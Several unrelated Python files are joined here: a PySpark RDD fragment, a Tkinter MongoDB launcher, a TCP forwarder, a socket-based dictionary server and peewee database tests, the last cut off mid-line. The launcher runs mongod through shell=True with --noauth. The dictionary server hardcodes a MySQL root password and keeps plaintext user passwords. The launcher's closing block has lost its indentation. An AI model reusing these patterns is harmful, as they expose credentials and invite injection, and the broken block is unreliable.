            def batched_func(split, iterator):
                return batched(oldfunc(split, iterator), batchSize)
            func = batched_func
        # Ship the function (and the bypass flag) to the worker as
        # base64-encoded cloudpickle blobs joined by spaces.
        cmds = [func, self._bypass_serializer]
        pipe_command = ' '.join(b64enc(cloudpickle.dumps(f)) for f in cmds)
        broadcast_vars = ListConverter().convert(
            [x._jbroadcast for x in self.ctx._pickled_broadcast_vars],
            self.ctx._gateway._gateway_client)
        self.ctx._pickled_broadcast_vars.clear()
        class_manifest = self._prev_jrdd.classManifest()
        env = copy.copy(self.ctx.environment)
        env['PYTHONPATH'] = os.environ.get("PYTHONPATH", "")
        env = MapConverter().convert(env, self.ctx._gateway._gateway_client)
        python_rdd = self.ctx._jvm.PythonRDD(self._prev_jrdd.rdd(),
            pipe_command, env, self.preservesPartitioning, self.ctx.pythonExec,
            broadcast_vars, self.ctx._javaAccumulator, class_manifest)
        self._jrdd_val = python_rdd.asJavaRDD()
        return self._jrdd_val

    def _is_pipelinable(self):
        # A cached or checkpointed stage must materialize its output, so it
        # cannot be fused with a downstream stage.
        return not (self.is_cached or self.is_checkpointed)
def _test():
    """Run this module's doctests against a local 4-core SparkContext.

    Exits the interpreter with a non-zero status if any doctest fails.
    """
    import doctest
    import sys
    from pyspark.context import SparkContext
    globs = globals().copy()
    # The small batch size here ensures that we see multiple batches,
    # even in these small test examples:
    globs['sc'] = SparkContext('local[4]', 'PythonTest', batchSize=2)
    (failure_count, test_count) = doctest.testmod(globs=globs)
    globs['sc'].stop()
    if failure_count:
        # sys.exit rather than the site-provided exit(): the latter is
        # absent when the interpreter runs with -S.
        sys.exit(-1)


if __name__ == "__main__":
    _test()
|
MongoApp.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import subprocess
import threading
import tkFont
import ttk
import webbrowser
from os import makedirs
from os.path import exists, expanduser, join as path_join
from sys import path as sys_path
from Tkinter import *
sys_path.append('libs')
from PIL import ImageTk, Image
HomeFolder = expanduser("~")
DATA_ROOT_FOLDER = path_join(HomeFolder, "MongoAppData")
class MongoApp():
    """Builds the mongod command line and launches the server process."""

    # Paths under the app's data root for the pid file and the database.
    pidPath = path_join(DATA_ROOT_FOLDER, 'logs', 'mongo.pid')
    dbPath = path_join(DATA_ROOT_FOLDER, 'data', 'db')

    def __init__(self, maxConns=10, noauth=True):
        self.maxConns = maxConns
        self.noauth = noauth
        self.CreateQuery()

    def CreateQuery(self):
        """Assemble the mongod argument string (stored on MongoQuery)."""
        pieces = [
            ' --pidfilepath ' + str(self.pidPath),
            ' --maxConns ' + str(self.maxConns),
            ' --dbpath ' + str(self.dbPath),
        ]
        if self.noauth:
            pieces.append(' --noauth')
        self.MongoQuery = ''.join(pieces)

    def StartMongo(self):
        """Launch mongod and return its Popen handle.

        NOTE(review): shell=True with a concatenated command string —
        paths containing spaces or shell metacharacters would break or
        be expanded by the shell here.
        """
        command = "bin/mongod " + self.MongoQuery
        return subprocess.Popen([command], stdin=subprocess.PIPE,
                                stdout=subprocess.PIPE,
                                stderr=subprocess.PIPE,
                                shell=True)

    def Start(self):
        """Launch mongod from a background thread (fire-and-forget)."""
        threading.Thread(target=self.StartMongo, args=()).start()
# Application structure:
# http://docs.python.org/2/library/tkinter.html#a-simple-hello-world-program
class Application(Frame):
    # Application structure:
    # http://docs.python.org/2/library/tkinter.html#a-simple-hello-world-program

    # Shared MongoApp instance — class attribute, so one per process.
    Mongo = MongoApp(maxConns=100)
    # 1 while mongod is believed to be running, else 0 (see StartServer).
    Status = 0

    def __init__(self, master=None):
        Frame.__init__(self, master)
        # Button row (this frame) on top; console log frame fills the rest.
        self.pack(expand=0, fill='both', padx=10, pady=10)
        self.ConsoleLogFrame = Frame(master)
        self.ConsoleLogFrame.pack(expand=1, fill='both')
        # Preload the status icons and logo used by the widgets below.
        self.ActiveIconImage = ImageTk.PhotoImage(
            Image.open("assets/images/icon-active.gif"))
        self.ErrorIconImage = ImageTk.PhotoImage(
            Image.open("assets/images/icon-error.gif"))
        self.OffIconImage = ImageTk.PhotoImage(
            Image.open("assets/images/icon-off.gif"))
        self.MongoDBLogo = ImageTk.PhotoImage(
            Image.open("assets/images/MongoDBLogo.gif"))
        self.menubar = Menu(self)
        MenuRoot = Menu(master, tearoff=0)
        MenuBar = Menu(MenuRoot, tearoff=0)
        MenuBar.add_command(label="GitHub Page", command=self.LinkGitHubPage)
        MenuBar.add_command(label="MongoDB Docs", command=self.LinkMongoDBDocs)
        MenuRoot.add_cascade(label="About MongoApp", menu=MenuBar)
        master.config(menu=MenuRoot)
        self.CreateWidgets()
        # Intercept window close so a running mongod can be terminated first.
        master.protocol("WM_DELETE_WINDOW", self.QuitEvent)

    def LinkGitHubPage(self):
        webbrowser.open('https://github.com/yildizberkay/MongoApp')

    def LinkMongoDBDocs(self):
        webbrowser.open('http://docs.mongodb.org/manual/')

    def OpenDBFolder(self):
        # macOS-specific: 'open' reveals the folder in Finder.
        subprocess.call(["open", DATA_ROOT_FOLDER+"/data"])

    def StartServer(self):
        # Runs on a worker thread (see StartServerMulti): streams mongod's
        # stdout into the log area and tracks process health via poll().
        self.MongoObject = self.Mongo.StartMongo()
        SStatus = 0  # local success flag: 1 once mongod looks healthy
        while True:
            Line = self.MongoObject.stdout.readline()
            self.AppendLog(Line)
            if str(self.MongoObject.poll()) == 'None':
                # poll() is None -> the process is still running.
                self.IconPanel.config(image=self.ActiveIconImage)
                self.Status = 1
                SStatus = 1
            elif str(self.MongoObject.poll()) == '100':
                # NOTE(review): exit code 100 is treated as a failure —
                # presumably mongod's abnormal-exit code; confirm.
                SStatus = 0
            else:
                self.IconPanel.config(image=self.OffIconImage)
            if not Line:
                # Empty read -> stdout hit EOF, i.e. mongod exited.
                break
        self.Status = 0
        self.MongoObject.stdout.close()
        if SStatus == 0:
            # mongod never reached (or fell out of) the running state:
            # reset the buttons and surface an error banner in the console.
            self.StopButton["state"] = DISABLED
            self.StartButton["state"] = NORMAL
            self.IconPanel.config(image=self.ErrorIconImage)
            self.AppendLog("Error!\n", 'ErrorHead')
            self.AppendLog("MongoDB is not working, please check "
                           "console log.\n", 'NotificationHead')
            self.AppendLog("--------------------------------------------------\n",
                           'NotificationHead')

    def StartServerMulti(self):
        # Button handler: toggle the buttons, then run StartServer on a
        # daemon thread so the Tk mainloop stays responsive.
        self.StartButton["state"] = DISABLED
        self.StopButton["state"] = NORMAL
        self.AppendLog("MongoDB is starting.\n", 'NotificationHead')
        self.SM = threading.Thread(target=self.StartServer, args=())
        self.SM.setDaemon(1)
        self.SM.start()

    def StopServer(self):
        # Terminate mongod; the reader loop in StartServer then sees EOF.
        self.MongoObject.terminate()
        self.StopButton["state"] = DISABLED
        self.StartButton["state"] = NORMAL
        self.Status = 0

    def ClearConsole(self):
        self.LogArea.delete("0.0", END)

    def CreateWidgets(self):
        # Layout: buttons on the left, status icon + logo on the right,
        # console log text area filling the lower frame.
        self.StartButton = Button(self)
        self.StartButton["text"] = "Start Mongo"
        self.StartButton["fg"] = "red"
        self.StartButton["command"] = self.StartServerMulti
        self.StartButton.pack({"side": "left"})
        self.StopButton = Button(self)
        self.StopButton["text"] = "Stop"
        self.StopButton["command"] = self.StopServer
        self.StopButton["state"] = DISABLED
        self.StopButton.pack({"side": "left"})
        self.GetInfo = Button(self)
        self.GetInfo["text"] = "Clear"
        self.GetInfo["command"] = self.ClearConsole
        self.GetInfo.pack({"side": "left"})
        self.OpenFolder = Button(self)
        self.OpenFolder["text"] = "Open DB Folder"
        self.OpenFolder["command"] = self.OpenDBFolder
        self.OpenFolder.pack({"side": "left"})
        self.PoweredMongoPanel = Label(self, image=self.MongoDBLogo)
        self.PoweredMongoPanel.image = self.MongoDBLogo
        self.PoweredMongoPanel.pack({"side": "right"})
        self.IconPanel = Label(self, image=self.OffIconImage)
        self.IconPanel.image = self.OffIconImage
        self.IconPanel.pack({"side": "right"})
        self.LogArea = Text(self.ConsoleLogFrame)
        self.LogArea["bd"] = "0px"
        self.LogArea["bg"] = "black"
        self.LogArea["fg"] = "green"
        self.LogArea["highlightthickness"] = "0px"
        self.LogArea.insert(INSERT, "Click to \"Start Mongo\" button for start"
                            " the server.\nGitHub repository: "
                            "http://git.io/MongoApp\nMongoApp version: 0.2.6\n")
        self.LogArea.pack(expand=1, fill='both')
        self.LogArea.tag_config("NotificationHead", background="#f1c40f",
                                foreground="#2c3e50")
        self.LogArea.tag_config("ErrorHead", background="#e74c3c",
                                foreground="#ffffff",
                                font=tkFont.Font(weight='bold'))

    def AppendLog(self, logline, tag='None'):
        # The string 'None' (not the None singleton) means "no style tag".
        if tag == 'None':
            self.LogArea.insert(END, logline)
        else:
            self.LogArea.insert(END, logline, (tag))
        self.LogArea.see('end')

    def QuitEvent(self):
        # Window-close hook: stop a running mongod before tearing down Tk.
        if self.Status == 1:
            self.MongoObject.terminate()
        self.master.destroy()
        self.master.quit()
if __name__ == "__main__":
if not exists(DATA_ROOT_FOLDER):
makedirs(DATA_ROOT_FOLDER+"/data/db")
makedirs(DATA_ROOT_FOLDER+"/logs")
root = Tk()
app = Application(master=root)
app.master.title("MongoApp")
app.master.geometry("640x480")
app.mainloop()
|
forwarding.py | #!/usr/bin/env python3
# Software License Agreement (BSD License)
#
# Copyright (c) 2022, Vm, Inc.
# All rights reserved.
#
# Author: Vinman <vinman.cub@gmail.com>
import sys
import time
import queue
import socket
import logging
import threading
# Module logger: INFO-level console output with a file:line prefix.
logger = logging.getLogger('tcp_forwarding')
logger.setLevel(logging.INFO)
# Remove any pre-existing console handlers so re-running this setup does
# not duplicate output. Iterate over a COPY of the handler list: the
# original iterated logger.handlers while removing from it, which skips
# elements (list mutation during iteration).
for handler in list(logger.handlers):
    if isinstance(handler, logging.StreamHandler):
        logger.removeHandler(handler)
stream_handler_fmt = '[%(levelname)s][%(asctime)s][%(filename)s:%(lineno)d] - - %(message)s'
stream_handler_date_fmt = '%Y-%m-%d %H:%M:%S'
stream_handler = logging.StreamHandler(sys.stdout)
stream_handler.setLevel(logging.INFO)
stream_handler.setFormatter(logging.Formatter(stream_handler_fmt, stream_handler_date_fmt))
logger.addHandler(stream_handler)
def get_time():
    """Return the current local time formatted as 'YYYY-MM-DD HH:MM:SS'."""
    now = time.localtime()
    return time.strftime('%Y-%m-%d %H:%M:%S', now)


def time_print(msg):
    """Print *msg* prefixed with a bracketed local-time stamp."""
    stamp = get_time()
    print('[{}] {}'.format(stamp, msg))
def create_tcp_socket_server(addr, backlog=1, show_log=True):
    """Create, bind and listen on a TCP server socket.

    Returns the listening socket, or None on any failure (the error is
    logged only when show_log is True).
    """
    try:
        listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        listener.bind(addr)
        listener.listen(backlog)
    except Exception as exc:
        if show_log:
            logger.error('Create TcpSocketServer Failed, {}'.format(exc))
        return None
    logger.info('[TcpSocketServer-{}] listen({}) on {}'.format(id(addr), backlog, addr))
    return listener
def create_tcp_socket_client(addr, show_log=True):
    """Create a TCP socket connected to addr.

    Args:
        addr: (host, port) tuple to connect to.
        show_log: log the error when connection fails.

    Returns:
        The connected socket, or None on failure.
    """
    sock = None
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        sock.connect(addr)
        logger.info('[TcpSocketClient-{}] Connect {} Success'.format(id(addr), addr))
        return sock
    except Exception as e:
        # BUG FIX: don't leak the fd when connect() fails.
        if sock is not None:
            sock.close()
        if show_log:
            logger.error('[TcpSocketClient-{}] Create Failed, {}'.format(id(addr), e))
        return None
class Forwarding(object):
    """Bidirectional TCP forwarding between two connected sockets.

    Four daemon threads shuttle bytes: one recv loop and one send loop per
    direction, coupled by a Queue + Condition pair. When either side hits
    EOF or an error, self.alive drops and all loops wind down.
    """

    def __init__(self, sock_in, sock_out, timeout=5):
        super().__init__()
        self.alive = True
        # Blocking sockets with a timeout so the recv loops can
        # periodically re-check self.alive.
        sock_in.setblocking(True)
        sock_in.settimeout(timeout)
        sock_out.setblocking(True)
        sock_out.settimeout(timeout)
        in2out_que = queue.Queue()  # forwarding from sock_in to sock_out
        out2in_que = queue.Queue()  # forwarding from sock_out to sock_in
        in2out_cond = threading.Condition()
        out2in_cond = threading.Condition()
        # get data from out2in_que, then send with sock_in
        in_send_t = threading.Thread(target=self._send_loop,
                                     args=(sock_in, out2in_que, out2in_cond), daemon=True)
        # recv data with sock_in, then put to in2out_que
        in_recv_t = threading.Thread(target=self._recv_loop,
                                     args=(sock_in, in2out_que, in2out_cond), daemon=True)
        # get data from in2out_que, then send with sock_out
        out_send_t = threading.Thread(target=self._send_loop,
                                      args=(sock_out, in2out_que, in2out_cond), daemon=True)
        # recv data with sock_out, then put to out2in_que
        out_recv_t = threading.Thread(target=self._recv_loop,
                                      args=(sock_out, out2in_que, out2in_cond), daemon=True)
        self.threads = [in_send_t, in_recv_t, out_send_t, out_recv_t]
        for t in self.threads:
            t.start()

    def join(self):
        """Block until all four forwarding threads exit."""
        for t in self.threads:
            t.join()

    def _send_loop(self, sock, que, cond):
        """Drain que and write each chunk to sock until shutdown."""
        addr = sock.getpeername()
        logger.info('[Forwarding] socket_send_loop start, {}'.format(addr))
        while self.alive:
            if que.qsize() == 0:
                # Sleep on the condition instead of busy-polling; the recv
                # loop notifies after each put (and once more on shutdown).
                with cond:
                    cond.wait()
                if que.qsize() == 0:
                    continue
            try:
                data = que.get()
                # BUG FIX: send() may transmit only part of the buffer,
                # silently corrupting the forwarded stream; sendall()
                # retries until every byte is written.
                sock.sendall(data)
            except Exception:
                break
        self.alive = False
        logger.info('[Forwarding] socket_send_loop over, {}'.format(addr))
        sock.close()

    def _recv_loop(self, sock, que, cond):
        """Read from sock and enqueue chunks until EOF, error or shutdown."""
        addr = sock.getpeername()
        logger.info('[Forwarding] socket_recv_loop start, {}'.format(addr))
        while self.alive:
            try:
                data = sock.recv(10240)
                if data:
                    que.put(data)
                    with cond:
                        cond.notify()
                else:
                    # Empty read: peer closed the connection.
                    break
            except socket.timeout:
                # Expected: loop around to re-check self.alive.
                continue
            except Exception:
                break
        self.alive = False
        logger.info('[Forwarding] socket_recv_loop over, {}'.format(addr))
        with cond:
            # Wake the paired send loop so it observes alive == False.
            cond.notify()
        sock.close()
|
dictionary_server.py | """
在线字典服务端
"""
from socket import *
from select import *
from multiprocessing import Process
import pymysql
from time import *
# Interface to the MySQL "dict" database.
class Database:
    """Thin wrapper over the MySQL word/user/history tables."""

    database_args = {
        "host": "localhost",
        "port": 3306,
        "user": "root",
        "password": "417355570",
        "database": "dict",
        "charset": "utf8"
    }

    def __init__(self):
        self.db = pymysql.connect(**Database.database_args)

    def close(self):
        self.db.close()

    def _lookup_mean(self, word):
        """Return the stored meaning of word, or 'Not Found'."""
        cur = self.db.cursor()
        try:
            cur.execute("select mean from words where word=%s;", [word])
            mean = cur.fetchone()
        finally:
            # Always release the cursor, even if execute() raises.
            cur.close()
        return mean[0] if mean else "Not Found"

    def find_word(self, word):
        """Look up a word's meaning without recording any history."""
        return self._lookup_mean(word)

    def name_not_exist(self, name):
        """True if no registered user has this name.

        BUG FIX: the old per-iteration if/else returned True as soon as
        the *first* row didn't match, so existing names were reported as
        free and could be registered twice.
        """
        cur = self.db.cursor()
        try:
            cur.execute("select name from users")
            rows = cur.fetchall()
        finally:
            cur.close()
        return all(row != (name,) for row in rows)

    def register(self, name, passwd, birthday):
        """Insert a new user row; returns False if the insert fails."""
        cur = self.db.cursor()
        try:
            if not birthday:  # empty birthday: let the column default apply
                cur.execute("insert into users(name,passwd) values(%s,%s)",
                            [name, passwd])
                self.db.commit()
                print("没有插入birthday")
            else:
                cur.execute(
                    "insert into users(name,passwd,birthday) values(%s,%s,%s)",
                    [name, passwd, birthday])
                self.db.commit()
                print("插入了birthday")
        except Exception:
            return False
        finally:
            cur.close()
        return True

    def password_same(self, name, passwd):
        """True if passwd matches the stored password for name.

        NOTE(review): assumes the name exists (callers check
        name_not_exist first); raises TypeError otherwise.
        """
        cur = self.db.cursor()
        try:
            cur.execute("select passwd from users where name =%s", [name])
            stored = cur.fetchone()[0]
        finally:
            cur.close()
        return stored == passwd

    def query(self, name, word):
        """Record the lookup in history, then return the word's meaning."""
        cur = self.db.cursor()
        try:
            cur.execute("select id from users where name=%s", [name])
            user_id = cur.fetchone()[0]
            cur.execute("insert into history(user_id,word) values(%s,%s)",
                        [user_id, word])
            self.db.commit()
        finally:
            cur.close()
        return self._lookup_mean(word)

    def history(self, name):
        """
        :return: ((name,word,query_time),(name,word,query_time))
        """
        cur = self.db.cursor()
        try:
            cur.execute(
                "select name,word,query_time from history left join users "
                "on history.user_id=users.id where name =%s;", [name])
            history_tuple = cur.fetchall()
        finally:
            cur.close()
        print(history_tuple)
        return history_tuple
class ClientConnector:
    """Accepts TCP clients and multiplexes all of them on one poll() loop.

    Protocol: each request is 'COMMAND##CONTENT'; 'QUIT' carries no
    content and closes the connection.
    """

    def __init__(self):
        self.sock = self.connect_client()
        self.handle = Handle()

    def connect_client(self):
        """Create the listening socket on 0.0.0.0:9999."""
        HOST = '0.0.0.0'
        PORT = 9999
        ADDR = (HOST, PORT)
        tcp_socket = socket()
        tcp_socket.bind(ADDR)
        tcp_socket.listen(5)
        return tcp_socket

    def io_listener(self):
        """Event loop: accept new clients and dispatch their requests."""
        # fd -> socket map so poll() events can be resolved back to sockets.
        MAP = {self.sock.fileno(): self.sock}
        p = poll()
        p.register(self.sock, POLLIN)
        # Loop over ready IO events forever.
        while True:
            events = p.poll()
            print("开始监控")
            for fd, event in events:
                # BUG FIX: compare ints with ==, not 'is'. Identity only
                # happens to work for CPython's small-int cache and breaks
                # for larger fd numbers / event masks.
                if fd == self.sock.fileno() and event == POLLIN:
                    connfd, addr = MAP[fd].accept()
                    print("Connect from", addr)
                    p.register(connfd, POLLIN)
                    MAP[connfd.fileno()] = connfd
                else:
                    data = MAP[fd].recv(1024)
                    if not data:
                        # Client vanished without sending QUIT.
                        print("客户端异常退出")
                        p.unregister(MAP[fd])
                        MAP[fd].close()
                        del MAP[fd]
                        continue
                    head = data.decode().split("##")
                    print(head)
                    command = head[0]
                    if command == "QUIT":
                        p.unregister(MAP[fd])
                        MAP[fd].close()
                        del MAP[fd]
                        continue
                    # BUG FIX: tolerate a missing '##' separator instead of
                    # letting IndexError kill the whole server loop.
                    content = head[1] if len(head) > 1 else ""
                    self.handle.handle(MAP[fd], command, content)
class Handle:
    """Parses client commands and replies over the connection socket.

    Reply convention: b"1" success, b"0" failure, b"2" bad format.
    """

    def __init__(self):
        self.database = Database()

    def handle(self, connfd, command, content):
        """Dispatch one COMMAND with space-separated content fields."""
        if command == "R":
            fields = content.split(" ")
            name = fields[0]
            passwd = fields[1]
            # BUG FIX: birthday is optional; the old code indexed
            # fields[2] unconditionally and raised IndexError whenever a
            # client registered without a birthday.
            birthday = fields[2] if len(fields) > 2 and fields[2] else ""
            self.register(connfd, name, passwd, birthday)
        elif command == "L":
            fields = content.split(" ")
            self.login(connfd, fields[0], fields[1])
        elif command == "Q":
            fields = content.split(" ")
            self.query(connfd, fields[0], fields[1])
        elif command == "H":
            self.history(connfd, content)
        elif command == "QUIT":
            self.quit(connfd)

    def register(self, connfd, name, passwd, birthday):
        """b"1" on success, b"0" if the name is taken, b"2" on bad data."""
        if self.database.name_not_exist(name):  # is the name still free?
            out = self.database.register(name, passwd, birthday)
            if out:
                connfd.send(b"1")
            else:
                connfd.send(b"2")  # 2 means the submitted data was invalid
        else:
            connfd.send(b"0")

    def login(self, connfd, name, passwd):
        """b"1" when name exists and the password matches, else b"0"."""
        if self.database.name_not_exist(name):
            connfd.send(b"0")
        else:
            if self.database.password_same(name, passwd):
                connfd.send(b"1")
            else:
                connfd.send(b"0")

    def query(self, connfd, name, word):
        """Send the word's meaning (and record the lookup in history)."""
        mean = self.database.query(name, word)
        connfd.send(mean.encode())

    def history(self, connfd, name):
        """Stream the user's lookup history, one line per send, then END."""
        history_tuple = self.database.history(name)
        for tuple in history_tuple:
            msg = f"用户名:{tuple[0]},查询单词:{tuple[1]},查询时间{tuple[2]}"
            connfd.send(msg.encode())
            # Small pause so the client can frame the separate sends.
            sleep(0.05)
        connfd.send(b"END")

    def quit(self, connfd):
        # Connection teardown is handled by the poll loop; nothing to do.
        pass
if __name__ == '__main__':
    # Accept connections and multiplex all clients on a single poll() loop.
    client_connector = ClientConnector()
    client_connector.io_listener()
|
database.py | from itertools import permutations
try:
from Queue import Queue
except ImportError:
from queue import Queue
import threading
from peewee import *
from peewee import Database
from peewee import FIELD
from peewee import attrdict
from peewee import sort_models
from .base import BaseTestCase
from .base import DatabaseTestCase
from .base import ModelTestCase
from .base import TestModel
from .base import db
from .base import db_loader
from .base import get_in_memory_db
from .base import requires_models
from .base import skip_case_unless
from .base_models import Category
from .base_models import Tweet
from .base_models import User
class TestDatabase(DatabaseTestCase):
    """Database-level behavior: pragmas, SQL context, connection state."""
    database = db_loader('sqlite3')

    def test_pragmas(self):
        # Pragma attributes proxy straight to the sqlite connection.
        self.database.cache_size = -2048
        self.assertEqual(self.database.cache_size, -2048)
        self.database.cache_size = -4096
        self.assertEqual(self.database.cache_size, -4096)

        # 'on'/'off' strings are read back normalized to 1/0.
        self.database.foreign_keys = 'on'
        self.assertEqual(self.database.foreign_keys, 1)
        self.database.foreign_keys = 'off'
        self.assertEqual(self.database.foreign_keys, 0)

    def test_pragmas_permanent(self):
        # pragma(..., permanent=True) must survive a close/reconnect.
        db = SqliteDatabase(':memory:')
        self.assertEqual(db.foreign_keys, 0)
        db.pragma('foreign_keys', 1, True)
        self.assertEqual(db.foreign_keys, 1)
        db.close()
        db.connect()
        self.assertEqual(db.foreign_keys, 1)

    def test_context_settings(self):
        class TestDatabase(Database):
            # Subclass overrides merge with (not replace) the defaults.
            field_types = {'BIGINT': 'TEST_BIGINT', 'TEXT': 'TEST_TEXT'}
            operations = {'LIKE': '~', 'NEW': '->>'}
            param = '$'

        test_db = TestDatabase(None)
        state = test_db.get_sql_context().state

        self.assertEqual(state.field_types['BIGINT'], 'TEST_BIGINT')
        self.assertEqual(state.field_types['TEXT'], 'TEST_TEXT')
        # Non-overridden entries fall through to the defaults.
        self.assertEqual(state.field_types['INT'], FIELD.INT)
        self.assertEqual(state.field_types['VARCHAR'], FIELD.VARCHAR)

        self.assertEqual(state.operations['LIKE'], '~')
        self.assertEqual(state.operations['NEW'], '->>')
        self.assertEqual(state.operations['ILIKE'], 'ILIKE')

        self.assertEqual(state.param, '$')
        self.assertEqual(state.quote, '"')

        # Constructor kwargs layer on top of the class-level overrides.
        test_db2 = TestDatabase(None, field_types={'BIGINT': 'XXX_BIGINT',
                                                   'INT': 'XXX_INT'})
        state = test_db2.get_sql_context().state
        self.assertEqual(state.field_types['BIGINT'], 'XXX_BIGINT')
        self.assertEqual(state.field_types['TEXT'], 'TEST_TEXT')
        self.assertEqual(state.field_types['INT'], 'XXX_INT')
        self.assertEqual(state.field_types['VARCHAR'], FIELD.VARCHAR)

    def test_connection_state(self):
        # connection() opens (or reuses) a connection; close() closes it.
        conn = self.database.connection()
        self.assertFalse(self.database.is_closed())
        self.database.close()
        self.assertTrue(self.database.is_closed())
        conn = self.database.connection()
        self.assertFalse(self.database.is_closed())

    def test_connection_initialization(self):
        # The _initialize_connection hook fires once per physical connection.
        state = {'count': 0}
        class TestDatabase(SqliteDatabase):
            def _initialize_connection(self, conn):
                state['count'] += 1
        db = TestDatabase(':memory:')
        self.assertEqual(state['count'], 0)

        conn = db.connection()
        self.assertEqual(state['count'], 1)

        # Since already connected, nothing happens here.
        conn = db.connection()
        self.assertEqual(state['count'], 1)

    def test_connect_semantics(self):
        state = {'count': 0}
        class TestDatabase(SqliteDatabase):
            def _initialize_connection(self, conn):
                state['count'] += 1
        db = TestDatabase(':memory:')

        db.connect()
        self.assertEqual(state['count'], 1)
        # connect() on an open database raises unless reuse_if_open=True.
        self.assertRaises(OperationalError, db.connect)
        self.assertEqual(state['count'], 1)
        self.assertFalse(db.connect(reuse_if_open=True))
        self.assertEqual(state['count'], 1)

        # The context manager closes the connection on exit.
        with db:
            self.assertEqual(state['count'], 1)
            self.assertFalse(db.is_closed())
        self.assertTrue(db.is_closed())

        with db:
            self.assertEqual(state['count'], 2)

    def test_execute_sql(self):
        # Raw SQL round-trip, including '?' parameter binding.
        self.database.execute_sql('CREATE TABLE register (val INTEGER);')
        self.database.execute_sql('INSERT INTO register (val) VALUES (?), (?)',
                                  (1337, 31337))
        cursor = self.database.execute_sql(
            'SELECT val FROM register ORDER BY val')
        self.assertEqual(cursor.fetchall(), [(1337,), (31337,)])
        self.database.execute_sql('DROP TABLE register;')
class TestThreadSafety(ModelTestCase):
    """Concurrent reads and writes through a shared Database object."""
    requires = [User]

    def test_multiple_writers(self):
        def create_users(idx):
            per_thread = 10
            for i in range(idx * per_thread, (idx + 1) * per_thread):
                User.create(username='u%d' % i)

        workers = [threading.Thread(target=create_users, args=(i,))
                   for i in range(4)]
        for worker in workers:
            worker.start()
        for worker in workers:
            worker.join()

        # 4 threads x 10 users each.
        self.assertEqual(User.select().count(), 40)

    def test_multiple_readers(self):
        data = Queue()

        def read_user_count(n):
            for _ in range(n):
                data.put(User.select().count())

        workers = [threading.Thread(target=read_user_count, args=(10,))
                   for _ in range(4)]
        for worker in workers:
            worker.start()
        for worker in workers:
            worker.join()

        # Every read completed and pushed a result.
        self.assertEqual(data.qsize(), 40)
class TestDeferredDatabase(BaseTestCase):
    def test_deferred_database(self):
        # Passing None defers initialization: connecting or querying
        # before init() must fail.
        deferred_db = SqliteDatabase(None)
        self.assertTrue(deferred_db.deferred)

        class DeferredModel(Model):
            class Meta:
                database = deferred_db

        self.assertRaises(Exception, deferred_db.connect)
        query = DeferredModel.select()
        self.assertRaises(Exception, query.execute)

        # init() with a real path makes the database usable.
        deferred_db.init(':memory:')
        self.assertFalse(deferred_db.deferred)

        conn = deferred_db.connect()
        self.assertFalse(deferred_db.is_closed())
        DeferredModel._schema.create_all()
        self.assertEqual(list(DeferredModel.select()), [])

        # Re-deferring with init(None) also closes the open connection.
        deferred_db.init(None)
        self.assertTrue(deferred_db.deferred)

        # The connection was automatically closed.
        self.assertTrue(deferred_db.is_closed())
class CatToy(TestModel):
    # Model bound to a non-default ("huey") schema; exercised by the
    # schema-namespace test below.
    description = TextField()

    class Meta:
        schema = 'huey'
@skip_case_unless(isinstance(db, PostgresqlDatabase))
class TestSchemaNamespace(ModelTestCase):
    """Schema-qualified tables; only meaningful on Postgres."""
    requires = [CatToy]

    def setUp(self):
        # The schema must exist before ModelTestCase creates the table in it.
        with self.database:
            self.execute('CREATE SCHEMA huey;')
        super(TestSchemaNamespace, self).setUp()

    def tearDown(self):
        super(TestSchemaNamespace, self).tearDown()
        with self.database:
            self.execute('DROP SCHEMA huey;')

    def test_schema(self):
        # Round-trip create/read through the schema-qualified table.
        toy = CatToy.create(description='fur mouse')
        toy_db = CatToy.select().where(CatToy.id == toy.id).get()
        self.assertEqual(toy.id, toy_db.id)
        self.assertEqual(toy.description, toy_db.description)
class TestSqliteIsolation(ModelTestCase):
    """Uncommitted changes must be invisible to other sqlite connections."""
    database = db_loader('sqlite3')
    requires = [User]

    def test_sqlite_isolation(self):
        for username in ('u1', 'u2', 'u3'): User.create(username=username)

        # A second connection to the same file sees the committed rows.
        new_db = db_loader('sqlite3')
        curs = new_db.execute_sql('SELECT COUNT(*) FROM users')
        self.assertEqual(curs.fetchone()[0], 3)

        self.assertEqual(User.select().count(), 3)
        self.assertEqual(User.delete().execute(), 3)

        with self.database.atomic():
            User.create(username='u4')
            User.create(username='u5')

            # Second conn does not see the changes.
            curs = new_db.execute_sql('SELECT COUNT(*) FROM users')
            self.assertEqual(curs.fetchone()[0], 0)

            # Third conn does not see the changes.
            new_db2 = db_loader('sqlite3')
            curs = new_db2.execute_sql('SELECT COUNT(*) FROM users')
            self.assertEqual(curs.fetchone()[0], 0)

            # Original connection sees its own changes.
            self.assertEqual(User.select().count(), 2)

        # After the transaction commits, other connections see the rows.
        curs = new_db.execute_sql('SELECT COUNT(*) FROM users')
        self.assertEqual(curs.fetchone()[0], 2)
class UniqueModel(TestModel):
    # Single-column unique constraint, used by the introspection tests.
    name = CharField(unique=True)
class IndexedModel(TestModel):
    first = CharField()
    last = CharField()
    dob = DateField()

    class Meta:
        # (columns, unique?) pairs: one unique and one non-unique
        # composite index, used by the introspection tests.
        indexes = (
            (('first', 'last', 'dob'), True),
            (('first', 'last'), False),
        )
class TestIntrospection(ModelTestCase):
    """Database.get_* metadata introspection APIs."""
    requires = [Category, User, UniqueModel, IndexedModel]

    def test_table_exists(self):
        self.assertTrue(self.database.table_exists(User._meta.table))
        self.assertFalse(self.database.table_exists(Table('nuggies')))

    def test_get_tables(self):
        tables = self.database.get_tables()
        required = set(m._meta.table_name for m in self.requires)
        self.assertTrue(required.issubset(set(tables)))

        # Dropping a table removes it from the listing.
        UniqueModel._schema.drop_all()
        tables = self.database.get_tables()
        self.assertFalse(UniqueModel._meta.table_name in tables)

    def test_get_indexes(self):
        indexes = self.database.get_indexes('uniquemodel')
        # Filter out backend-generated primary-key indexes.
        data = [(index.name, index.columns, index.unique, index.table)
                for index in indexes
                if index.name not in ('uniquemodel_pkey', 'PRIMARY')]
        self.assertEqual(data, [
            ('uniquemodel_name', ['name'], True, 'uniquemodel')])

        indexes = self.database.get_indexes('indexedmodel')
        data = [(index.name, index.columns, index.unique, index.table)
                for index in indexes
                if index.name not in ('indexedmodel_pkey', 'PRIMARY')]
        self.assertEqual(sorted(data), [
            ('indexedmodel_first_last', ['first', 'last'], False,
